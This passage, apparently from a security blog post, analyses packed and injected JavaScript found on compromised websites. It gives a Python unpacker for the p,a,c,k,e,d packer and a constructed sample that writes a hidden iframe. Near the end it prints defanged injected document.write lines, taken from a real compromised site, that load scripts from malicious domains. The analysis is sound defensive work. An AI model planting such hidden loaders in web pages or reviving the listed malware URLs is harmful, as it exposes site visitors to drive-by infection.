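    """Equivalent of the eval(function(p,a,c,k,e,d){...}) prologue: each \\w+
    token that decodes to an index below `c` with a non-empty entry in `k` is
    replaced by that entry; an empty entry means 'keep the token as written'
    (that is how literals like `1` or `f` survive packing). A single regex pass
    avoids re-expanding text produced by an earlier substitution."""
    def repl(m):
        token = m.group(0)
        idx = decode_index(token, a)
        if idx is None or idx >= c or idx >= len(k) or not k[idx]:
            return token
        return k[idx]
    return re.sub(r"\b\w+\b", repl, p)


# Matches the packer's argument list: ('<p>', a, c, '<k>'.split('|'), ...
PACKED_CALL = re.compile(
    r"\}\('((?:[^'\\]|\\.)*)',\s*(\d+),\s*(\d+),\s*'((?:[^'\\]|\\.)*)'\.split\('\|'\)",
    re.S,
)


def unpack_eval(script):
    """Locate the packed call inside an eval(...) wrapper and expand it."""
    m = PACKED_CALL.search(script)
    if not m:
        raise ValueError("no p,a,c,k,e,d packer call found")
    p = m.group(1).replace("\\'", "'")          # undo the JS escaping inside p
    return unpack(p, int(m.group(2)), int(m.group(3)), m.group(4).split("|"))


# Constructed sample of the same shape as the gating/iframe loader above
# (cookie check, then a hidden iframe). example.invalid is a placeholder host;
# this is not the packed text captured from the compromised site.
PACKED = (
    "eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};"
    "if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}"
    "k=[function(e){return d[e]}];e=function(){return'\\\\w+'};c=1};"
    "while(c--){if(k[c]){p=p.replace(new RegExp('\\\\b'+e(c)+'\\\\b','g'),k[c])}}"
    "return p}('0 2=3 4();5(6.7.8(\"9=f\")==-1){6.a(\"<b c=1 d=1 "
    "e=\\'g://h.i/j/\\' k=\\'l:m\\'></b>\")}',36,23,"
    "'var||today|new|Date|if|document|cookie|indexOf|_df|write|iframe|width|"
    "height|src||http|example|invalid|b2b|style|display|none'.split('|'),0,{}))"
)


if __name__ == "__main__":
    print(unpack_eval(PACKED))
```

Nothing is evaluated: the unpacker treats the packed text purely as data, which is the property you want when feeding it samples pulled from compromised sites. Real packer output often nests, with the unpacked result itself being another eval(function(p,a,c,k,e,d)...) call, so run unpack_eval() in a loop until it raises.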

Our systems flagged this as unsafe; for further validation one can look up the domain in the Malware Domain List, which carries the following entry:

2009/03/28_00:00 loading-atm.net/b2b/ 83.133.123.140 t490.1paket.com redirects to exploits Jsfgvbg (loading-atm@mail.ru) 13237

The exploit appears to deliver an executable to the victim's system, which in turn acts as a downloader and tries to fetch two more files from the same domain.

And to whet your appetite more, here’s another example captured from hxxp://www. aikidoofqueens. com/kids/

var ma=new Array();var mx=new Array();var my=new Array();var mc=new Array();
var mpos=new Array();var mal=0;var main=0;var menuw=200;var psrc=0;
var pname="";var al="";var gd=0;var gx,gy;var d=document;
var NS7=(!d.all&&d.getElementById);var NS4=(!d.getElementById);
var IE5=(!NS4&&!NS7&&(navigator.userAgent.indexOf('MSIE 5.0')!=-1
||navigator.userAgent.indexOf('MSIE 5.2')!=-1));var IE5p5=(!NS4&&
!NS7&&navigator.userAgent.indexOf('MSIE 5.5')!=-1);var NS6=(NS7&&
navigator.userAgent.indexOf('Netscape6')!=-1);
var SAF=navigator.userAgent.indexOf('Safari')!=-1;p=navigator.userAgent.indexOf('Opera');
if(p>-1){p=navigator.userAgent.charAt(p+6);if(p>6)NS7=1;else NS4=1;}var 

** code removed for brevity **

clipMenu(i,el){if(el.offsetLeft>mx[i])el.style.clip="rect("+(my[i]-el.offsetTop)+"px "
+(el.offsetWidth+(mx[i]-el.offsetLeft))+"px "+el.offsetHeight+"px "+0+"px)";
else el.style.clip="rect("+(my[i]-el.offsetTop)+"px "+el.offsetWidth+"px "+
el.offsetHeight+"px "+(mx[i]-el.offsetLeft)+"px)";}

** malicious code **

document.write('< script src=hxxp://b olccorlando.org/_vti_txt/event_pwf.php ><\/s cript>');
document.write('<sc ript src=hxxp://gh anafoneshop.com/category_images/vieworder.php ><\/s cript>');
document.write('<scr ipt src=hxxp://gha nafoneshop.com/category_images/vieworder.php ><\/sc ript>');
document.write('<scri pt src=hxxp://ghan afoneshop.com/category_images/vieworder.php ><\/scr ipt>');
document.write('<scrip t src=hxxp://ghana foneshop.com/category_images/vieworder.php ><\/scri pt>');
document.write('<sc ript src=hxxp://ghanaf oneshop.com/category_images/vieworder.php ><\/scrip t>');
document.write('<scr ipt src=hxxp://ramazan -toker.com/images/gifimg.php ><\/sc ript>');

Security